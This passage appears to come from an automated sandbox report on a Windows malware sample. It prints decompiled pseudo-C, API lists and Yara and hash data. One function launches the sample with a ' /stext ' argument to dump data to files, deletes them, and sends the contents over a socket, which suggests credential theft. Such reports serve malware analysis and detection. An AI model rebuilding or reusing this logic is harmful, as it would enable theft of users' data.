                                                                                                				signed int _t243;
                                                                                                				signed int _t244;
                                                                                                				signed int _t245;
                                                                                                				signed int _t246;
                                                                                                				signed int _t247;
                                                                                                				signed int _t248;
                                                                                                				signed int _t249;
                                                                                                				signed int _t250;
                                                                                                				signed int _t251;
                                                                                                				signed int _t252;
                                                                                                				signed int _t253;
                                                                                                				signed int _t254;
                                                                                                				signed int _t255;
                                                                                                				signed int _t256;
                                                                                                				char* _t257;
                                                                                                
                                                                                                				_t224 = __edx;
                                                                                                				_t210 = _a4;
                                                                                                				_v16 = 0;
                                                                                                				_v28 = _t210;
                                                                                                				_v24 = 0;
                                                                                                				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                                                                                                					_t234 = E00440628(0, 1, 0x50);
                                                                                                					_v8 = _t234;
                                                                                                					E004414D5(0);
                                                                                                					if(_t234 != 0) {
                                                                                                						_t227 = E00440628(0, 1, 4);
                                                                                                						_v12 = _t227;
                                                                                                						E004414D5(0);
                                                                                                						if(_t227 != 0) {
                                                                                                							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                                                                                                								_t213 = 0x14;
                                                                                                								memcpy(_v8, 0x46c178, _t213 << 2);
                                                                                                								L25:
                                                                                                								_t236 = _v8;
                                                                                                								_t231 = _v16;
                                                                                                								 *_t236 =  *( *(_t210 + 0x88));
                                                                                                								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                                                                                                								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                                                                                                								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                                                                                                								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                                                                                                								 *_v12 = 1;
                                                                                                								if(_t231 != 0) {
                                                                                                									 *_t231 = 1;
                                                                                                								}
                                                                                                								goto L27;
                                                                                                							}
                                                                                                							_t232 = E00440628(0, 1, 4);
                                                                                                							_v16 = _t232;
                                                                                                							E004414D5(0);
                                                                                                							if(_t232 != 0) {
                                                                                                								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                                                                                                								_t14 = _t234 + 0xc; // 0xc
                                                                                                								_t237 = E0044C344(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
                                                                                                								_t238 = _t237 | E0044C344(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                                                                                                								_t239 = _t238 | E0044C344(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                                                                                                								_t240 = _t239 | E0044C344(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                                                                                                								_v20 = _v8 + 0x1c;
                                                                                                								_t241 = _t240 | E0044C344(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                                                                                                								_t242 = _t241 | E0044C344(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                                                                                                								_t243 = _t242 | E0044C344(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                                                                                                								_t244 = _t243 | E0044C344(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                                                                                                								_t245 = _t244 | E0044C344(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                                                                                                								_t246 = _t245 | E0044C344(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                                                                                                								_t247 = _t246 | E0044C344(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                                                                                                								_t248 = _t247 | E0044C344(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                                                                                                								_t249 = _t248 | E0044C344(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                                                                                                								_t250 = _t249 | E0044C344(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                                                                                                								_t251 = _t250 | E0044C344(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                                                                                                								_t252 = _t251 | E0044C344(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                                                                                                								_t253 = _t252 | E0044C344(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                                                                                                								_t254 = _t253 | E0044C344(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                                                                                                								_t255 = _t254 | E0044C344(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                                                                                                								_t256 = _t255 | E0044C344(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                                                                                                								if((E0044C344(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                                                                                                									_t226 =  *_v20;
                                                                                                									while( *_t226 != 0) {
                                                                                                										_t195 =  *_t226;
                                                                                                										if(_t195 < 0x30 || _t195 > 0x39) {
                                                                                                											if(_t195 != 0x3b) {
                                                                                                												goto L17;
                                                                                                											}
                                                                                                											_t257 = _t226;
                                                                                                											do {
                                                                                                												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                                                                                                												_t257 = _t257 + 1;
                                                                                                											} while ( *_t257 != 0);
                                                                                                										} else {
                                                                                                											 *_t226 = _t195 - 0x30;
                                                                                                											L17:
                                                                                                											_t226 = _t226 + 1;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								E004499D2(_v8);
                                                                                                								E004414D5(_v8);
                                                                                                								E004414D5(_v12);
                                                                                                								E004414D5(_v16);
                                                                                                								goto L4;
                                                                                                							}
                                                                                                							E004414D5(_t234);
                                                                                                							E004414D5(_v12);
                                                                                                							L7:
                                                                                                							goto L4;
                                                                                                						}
                                                                                                						E004414D5(_t234);
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					L4:
                                                                                                					return 1;
                                                                                                				} else {
                                                                                                					_t231 = 0;
                                                                                                					_v12 = 0;
                                                                                                					_t236 = 0x46c178;
                                                                                                					L27:
                                                                                                					_t105 =  *(_t210 + 0x84);
                                                                                                					if(_t105 != 0) {
                                                                                                						asm("lock dec dword [eax]");
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                                                                                                						asm("lock xadd [ecx], eax");
                                                                                                						if((_t105 | 0xffffffff) == 0) {
                                                                                                							E004414D5( *(_t210 + 0x88));
                                                                                                							E004414D5( *((intOrPtr*)(_t210 + 0x7c)));
                                                                                                						}
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                                                                                                					 *(_t210 + 0x84) = _t231;
                                                                                                					 *(_t210 + 0x88) = _t236;
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}


                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 379b776cd4db7c6d47c6fed2fecee08d894be6b99d165cf0dac9491f38540c5d
                                                                                                • Instruction ID: 60f97a274b605075af4bdc0fb22cd58207239f416a6aac486b6092a6b1b80701
                                                                                                • Opcode Fuzzy Hash: 379b776cd4db7c6d47c6fed2fecee08d894be6b99d165cf0dac9491f38540c5d
                                                                                                • Instruction Fuzzy Hash: 52C13571D40204AFEB60DFA9CC82FEF77F8AB44714F14416AFA05EB282D6749D419758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E00404F18(void* __ecx, void* __edx) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				long _t29;
                                                                                                				int _t32;
                                                                                                				long _t33;
                                                                                                				long _t36;
                                                                                                				void* _t48;
                                                                                                				void* _t50;
                                                                                                
                                                                                                				_t48 = __edx;
                                                                                                				_t50 = __ecx;
                                                                                                				_t1 = _t50 + 0x68; // 0x0
                                                                                                				_t29 = WaitForSingleObject( *_t1, 0xffffffff);
                                                                                                				if( *(_t50 + 4) != 0xffffffff) {
                                                                                                					_t5 = _t50 + 4; // 0xffffffff
                                                                                                					__imp__#3( *_t5);
                                                                                                					if(_t29 == 0) {
                                                                                                						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
                                                                                                					}
                                                                                                					_t45 = _t50;
                                                                                                					if(E004047EB(_t50) != 0) {
                                                                                                						E004051C8(_t45, _t48, 1);
                                                                                                					}
                                                                                                					if( *((char*)(_t50 + 1)) != 0) {
                                                                                                						_t9 = _t50 + 0x70; // 0x0
                                                                                                						_t33 = WaitForSingleObject( *_t9, 0xffffffff);
                                                                                                						_t10 = _t50 + 0x50; // 0x0
                                                                                                						E0041D235(_t33, CloseHandle,  *_t10, _t48, SetEvent, _t50);
                                                                                                						_t11 = _t50 + 0x70; // 0x0
                                                                                                						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
                                                                                                						SetEvent( *_t11);
                                                                                                						_t14 = _t50 + 0x6c; // 0x0
                                                                                                						_t36 = WaitForSingleObject( *_t14, 0xffffffff);
                                                                                                						_t15 = _t50 + 0x4c; // 0x0
                                                                                                						E0041D235(_t36, CloseHandle,  *_t15, _t48, SetEvent, _t50);
                                                                                                						_t16 = _t50 + 0x6c; // 0x0
                                                                                                						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
                                                                                                						SetEvent( *_t16);
                                                                                                						_t19 = _t50 + 0x70; // 0x0
                                                                                                						CloseHandle( *_t19);
                                                                                                						_t20 = _t50 + 0x6c; // 0x0
                                                                                                						CloseHandle( *_t20);
                                                                                                						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
                                                                                                						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
                                                                                                					}
                                                                                                					_t25 = _t50 + 0x68; // 0x0
                                                                                                					SetEvent( *_t25);
                                                                                                					_t26 = _t50 + 0x68; // 0x0
                                                                                                					_t32 = CloseHandle( *_t26);
                                                                                                				} else {
                                                                                                					_t3 = _t50 + 0x68; // 0x0
                                                                                                					SetEvent( *_t3);
                                                                                                					_t4 = _t50 + 0x68; // 0x0
                                                                                                					_t32 = CloseHandle( *_t4);
                                                                                                				}
                                                                                                				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
                                                                                                				return _t32;
                                                                                                			}


                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                • closesocket.WS2_32(FFFFFFFF), ref: 00404F48
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404F7F
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F94
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404F9B
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FB0
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FB5
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FBA
                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FC7
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404FCC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 799248718991efb6832a4a5a939dbaa35ca11c72f35604757b2b7cf89567cee6
                                                                                                • Instruction ID: e72ad4899674d7cbad9bde08c7a86c747e4a32ce43b4c226188045091251e1ff
                                                                                                • Opcode Fuzzy Hash: 799248718991efb6832a4a5a939dbaa35ca11c72f35604757b2b7cf89567cee6
                                                                                                • Instruction Fuzzy Hash: AB213E71004B11AFDB316B22DC48B16BBE1FF8036AF104A6DF1A615AF1CB75E851DB08
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00410334(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
                                                                                                				char _v5;
                                                                                                				char _v6;
                                                                                                				char _v7;
                                                                                                				char _v12;
                                                                                                				char _v36;
                                                                                                				char _v60;
                                                                                                				char _v84;
                                                                                                				char _v108;
                                                                                                				char _v132;
                                                                                                				char _v156;
                                                                                                				char _v180;
                                                                                                				char _v204;
                                                                                                				char _v228;
                                                                                                				char _v252;
                                                                                                				char _v276;
                                                                                                				char _v300;
                                                                                                				char _v324;
                                                                                                				char _v348;
                                                                                                				char _v372;
                                                                                                				char _v396;
                                                                                                				char _v420;
                                                                                                				char _v444;
                                                                                                				char _v468;
                                                                                                				short _v988;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* _t173;
                                                                                                				void* _t199;
                                                                                                				void* _t225;
                                                                                                				void* _t226;
                                                                                                				void* _t394;
                                                                                                				void* _t399;
                                                                                                				void* _t402;
                                                                                                				void* _t405;
                                                                                                
                                                                                                				_t405 = __eflags;
                                                                                                				_v12 = 0;
                                                                                                				GetModuleFileNameW(0,  &_v988, 0x104);
                                                                                                				_v5 = 0;
                                                                                                				_v6 = 0;
                                                                                                				E004020C7(0,  &_v300);
                                                                                                				E004020C7(0,  &_v276);
                                                                                                				E004020C7(0,  &_v252);
                                                                                                				E004189FF( &_v228, 0x30, E00401F87(E00417A83( &_v36)));
                                                                                                				E00401FB9();
                                                                                                				E004189FF( &_v204, 0x30, E00401F87(E00417A83( &_v36)));
                                                                                                				E00401FB9();
                                                                                                				E004189FF( &_v180, 0x30, E00401F87(E00417A83( &_v36)));
                                                                                                				E00401FB9();
                                                                                                				E00401F87( &_a52);
                                                                                                				_t393 = L" /stext \"";
                                                                                                				_t224 = E00414D29(E00401EDD(E00403098(0,  &_v396, E0040440A(0,  &_v420, E004043E6(0,  &_v444,  &_v988, _t405, E00404260(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401F87( &_a76);
                                                                                                				_t225 = E00414D29(E00401EDD(E00403098(_t224,  &_v324, E0040440A(_t137,  &_v348, E004043E6(_t137,  &_v372,  &_v988, _t405, E00404260(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401F87( &_a100);
                                                                                                				_v7 = E00414D29(E00401EDD(E00403098(_t225,  &_v84, E0040440A(_t225,  &_v108, E004043E6(_t225,  &_v132,  &_v988, _t405, E00404260(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				_t399 =  ==  ? 1 : 0;
                                                                                                				if(_t225 == 0) {
                                                                                                					_t399 = _t399 + 1;
                                                                                                				}
                                                                                                				if(_v7 == 0) {
                                                                                                					_t399 = _t399 + 1;
                                                                                                				}
                                                                                                				_t226 = DeleteFileW;
                                                                                                				_t394 = 0;
                                                                                                				L5:
                                                                                                				L5:
                                                                                                				if(E004183CC(E00401EDD( &_v228),  &_v300) != 0) {
                                                                                                					_v12 = 1;
                                                                                                					DeleteFileW(E00401EDD( &_v228));
                                                                                                				}
                                                                                                				if(E004183CC(E00401EDD( &_v204),  &_v276) != 0) {
                                                                                                					_v5 = 1;
                                                                                                					DeleteFileW(E00401EDD( &_v204));
                                                                                                				}
                                                                                                				if(E004183CC(E00401EDD( &_v180),  &_v252) != 0) {
                                                                                                					_v6 = 1;
                                                                                                					DeleteFileW(E00401EDD( &_v180));
                                                                                                				}
                                                                                                				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				L15:
                                                                                                				_t173 = E00405C1B("0");
                                                                                                				_t418 = _t173;
                                                                                                				if(_t173 == 0) {
                                                                                                					E00402F85(_t226, _t402 - 0x18, E00402F85(_t226,  &_v156, E00402F85(_t226,  &_v132, E00402F85(_t226,  &_v108, E00402F85(_t226,  &_v84, E00402FA9( &_v60,  &_a28, 0x46e250), __eflags,  &_v300), __eflags, 0x46e250), __eflags,  &_v276), __eflags, 0x46e250), __eflags,  &_v252);
                                                                                                					_push(0x6a);
                                                                                                					E00404BB7(_t226, 0x46e6e8, _t180, __eflags);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                				} else {
                                                                                                					_t199 = E00417C16(_t226,  &_v324, _t399);
                                                                                                					E00402F0F(_t402 - 0x18, E00402F85(_t226,  &_v156, E00402F85(_t226,  &_v132, E00402F85(_t226,  &_v108, E00402F85(_t226,  &_v84, E00402F85(_t226,  &_v60, E00402F85(_t226,  &_v372, E00402FA9( &_v348,  &_a28, 0x46e250), _t418,  &_v300), _t418, 0x46e250), _t418,  &_v276), _t418, 0x46e250), _t418,  &_v252), _t418, 0x46e250), _t199);
                                                                                                					_push(0x69);
                                                                                                					E00404BB7(_t226, 0x46e6e8, _t207, _t418);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return E00401FB9();
                                                                                                				L14:
                                                                                                				Sleep(0x1f4);
                                                                                                				_t394 = _t394 + 1;
                                                                                                				if(_t394 < 0xa) {
                                                                                                					goto L5;
                                                                                                				}
                                                                                                				goto L15;
                                                                                                			}






































                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410352
                                                                                                  • Part of subcall function 00417A83: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415E), ref: 00417AAA
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004041D7,?,004041D7,004604D4), ref: 00414D3F
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004604D4,?,004041D7,004604D4), ref: 00414D48
                                                                                                • DeleteFileW.KERNEL32(00000000,004604D4,004604D4,004604D4), ref: 004105D7
                                                                                                • DeleteFileW.KERNEL32(00000000,004604D4,004604D4,004604D4), ref: 00410605
                                                                                                • DeleteFileW.KERNEL32(00000000,004604D4,004604D4,004604D4), ref: 00410633
                                                                                                • Sleep.KERNEL32(000001F4,004604D4,004604D4,004604D4), ref: 0041064C
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                                                                                • String ID: /stext "$PF$PF$F$F
                                                                                                • API String ID: 1351907930-1667803458
                                                                                                • Opcode ID: c790b0065922cbb01fccee7cd7bbbd9f635edb1bfe0eee90782f4a45a1587345
                                                                                                • Instruction ID: dfc6d6d7a8e1c1e06e788e5705e46e24d2358ea2877a2c2a7d8cc917f82f92d4
                                                                                                • Opcode Fuzzy Hash: c790b0065922cbb01fccee7cd7bbbd9f635edb1bfe0eee90782f4a45a1587345
                                                                                                • Instruction Fuzzy Hash: A1D141719001199BCB18FBA1DC91AEDB375AF54308F5041BFE50A771E2EF789E89CA48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 83%
                                                                                                			E0044E510(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                                                                                                				signed int _v8;
                                                                                                				char _v22;
                                                                                                				struct _cpinfo _v28;
                                                                                                				short* _v32;
                                                                                                				int _v36;
                                                                                                				char* _v40;
                                                                                                				signed int _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				void* _v60;
                                                                                                				signed int _t63;
                                                                                                				int _t70;
                                                                                                				signed int _t72;
                                                                                                				short* _t73;
                                                                                                				signed int _t77;
                                                                                                				short* _t87;
                                                                                                				void* _t89;
                                                                                                				void* _t92;
                                                                                                				int _t99;
                                                                                                				intOrPtr _t101;
                                                                                                				intOrPtr _t102;
                                                                                                				signed int _t112;
                                                                                                				char* _t114;
                                                                                                				char* _t115;
                                                                                                				void* _t120;
                                                                                                				void* _t121;
                                                                                                				intOrPtr _t122;
                                                                                                				intOrPtr _t123;
                                                                                                				intOrPtr* _t125;
                                                                                                				short* _t126;
                                                                                                				int _t128;
                                                                                                				int _t129;
                                                                                                				short* _t130;
                                                                                                				intOrPtr* _t131;
                                                                                                				signed int _t132;
                                                                                                				short* _t133;
                                                                                                
                                                                                                				_t63 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t63 ^ _t132;
                                                                                                				_t128 = _a20;
                                                                                                				_v44 = _a4;
                                                                                                				_v48 = _a8;
                                                                                                				_t67 = _a24;
                                                                                                				_v40 = _a24;
                                                                                                				_t125 = _a16;
                                                                                                				_v36 = _t125;
                                                                                                				if(_t128 <= 0) {
                                                                                                					if(_t128 >= 0xffffffff) {
                                                                                                						goto L2;
                                                                                                					} else {
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t128 = E004414B9(_t125, _t128);
                                                                                                					_t67 = _v40;
                                                                                                					L2:
                                                                                                					_t99 = _a28;
                                                                                                					if(_t99 <= 0) {
                                                                                                						if(_t99 < 0xffffffff) {
                                                                                                							goto L5;
                                                                                                						} else {
                                                                                                							goto L7;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t99 = E004414B9(_t67, _t99);
                                                                                                						L7:
                                                                                                						_t70 = _a32;
                                                                                                						if(_t70 == 0) {
                                                                                                							_t14 =  &_v44; // 0x44e7e9
                                                                                                							_t70 =  *( *((intOrPtr*)( *_t14)) + 8);
                                                                                                							_a32 = _t70;
                                                                                                						}
                                                                                                						if(_t128 == 0 || _t99 == 0) {
                                                                                                							if(_t128 != _t99) {
                                                                                                								if(_t99 <= 1) {
                                                                                                									if(_t128 <= 1) {
                                                                                                										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                                                                											goto L5;
                                                                                                										} else {
                                                                                                											if(_t128 <= 0) {
                                                                                                												if(_t99 <= 0) {
                                                                                                													goto L36;
                                                                                                												} else {
                                                                                                													_t89 = 2;
                                                                                                													if(_v28 >= _t89) {
                                                                                                														_t114 =  &_v22;
                                                                                                														if(_v22 != 0) {
                                                                                                															_t131 = _v40;
                                                                                                															while(1) {
                                                                                                																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                                                                																if(_t122 == 0) {
                                                                                                																	goto L15;
                                                                                                																}
                                                                                                																_t101 =  *_t131;
                                                                                                																if(_t101 <  *_t114 || _t101 > _t122) {
                                                                                                																	_t114 = _t114 + _t89;
                                                                                                																	if( *_t114 != 0) {
                                                                                                																		continue;
                                                                                                																	} else {
                                                                                                																		goto L15;
                                                                                                																	}
                                                                                                																}
                                                                                                																goto L63;
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                													goto L15;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t92 = 2;
                                                                                                												if(_v28 >= _t92) {
                                                                                                													_t115 =  &_v22;
                                                                                                													if(_v22 != 0) {
                                                                                                														while(1) {
                                                                                                															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                                                                															if(_t123 == 0) {
                                                                                                																goto L17;
                                                                                                															}
                                                                                                															_t102 =  *_t125;
                                                                                                															if(_t102 <  *_t115 || _t102 > _t123) {
                                                                                                																_t115 = _t115 + _t92;
                                                                                                																if( *_t115 != 0) {
                                                                                                																	continue;
                                                                                                																} else {
                                                                                                																	goto L17;
                                                                                                																}
                                                                                                															}
                                                                                                															goto L63;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												goto L17;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										L17:
                                                                                                										_push(3);
                                                                                                										goto L13;
                                                                                                									}
                                                                                                								} else {
                                                                                                									L15:
                                                                                                								}
                                                                                                							} else {
                                                                                                								_push(2);
                                                                                                								L13:
                                                                                                							}
                                                                                                						} else {
                                                                                                							L36:
                                                                                                							_t126 = 0;
                                                                                                							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                                                                                                							_v44 = _t72;
                                                                                                							if(_t72 == 0) {
                                                                                                								L5:
                                                                                                							} else {
                                                                                                								_t120 = _t72 + _t72;
                                                                                                								asm("sbb eax, eax");
                                                                                                								if((_t120 + 0x00000008 & _t72) == 0) {
                                                                                                									_t73 = 0;
                                                                                                									_v32 = 0;
                                                                                                									goto L45;
                                                                                                								} else {
                                                                                                									asm("sbb eax, eax");
                                                                                                									_t85 = _t72 & _t120 + 0x00000008;
                                                                                                									_t112 = _t120 + 8;
                                                                                                									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                                                                										asm("sbb eax, eax");
                                                                                                										_t87 = E00440C6C(_t112, _t85 & _t112);
                                                                                                										_v32 = _t87;
                                                                                                										if(_t87 == 0) {
                                                                                                											goto L61;
                                                                                                										} else {
                                                                                                											 *_t87 = 0xdddd;
                                                                                                											goto L43;
                                                                                                										}
                                                                                                									} else {
                                                                                                										asm("sbb eax, eax");
                                                                                                										E004519B0();
                                                                                                										_t87 = _t133;
                                                                                                										_v32 = _t87;
                                                                                                										if(_t87 == 0) {
                                                                                                											L61:
                                                                                                											_t100 = _v32;
                                                                                                										} else {
                                                                                                											 *_t87 = 0xcccc;
                                                                                                											L43:
                                                                                                											_t73 =  &(_t87[4]);
                                                                                                											_v32 = _t73;
                                                                                                											L45:
                                                                                                											if(_t73 == 0) {
                                                                                                												goto L61;
                                                                                                											} else {
                                                                                                												_t40 =  &_v44; // 0x44e7e9
                                                                                                												_t129 = _a32;
                                                                                                												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73,  *_t40) == 0) {
                                                                                                													goto L61;
                                                                                                												} else {
                                                                                                													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                                                                                                													_v36 = _t77;
                                                                                                													if(_t77 == 0) {
                                                                                                														goto L61;
                                                                                                													} else {
                                                                                                														_t121 = _t77 + _t77;
                                                                                                														_t108 = _t121 + 8;
                                                                                                														asm("sbb eax, eax");
                                                                                                														if((_t121 + 0x00000008 & _t77) == 0) {
                                                                                                															_t130 = _t126;
                                                                                                															goto L56;
                                                                                                														} else {
                                                                                                															asm("sbb eax, eax");
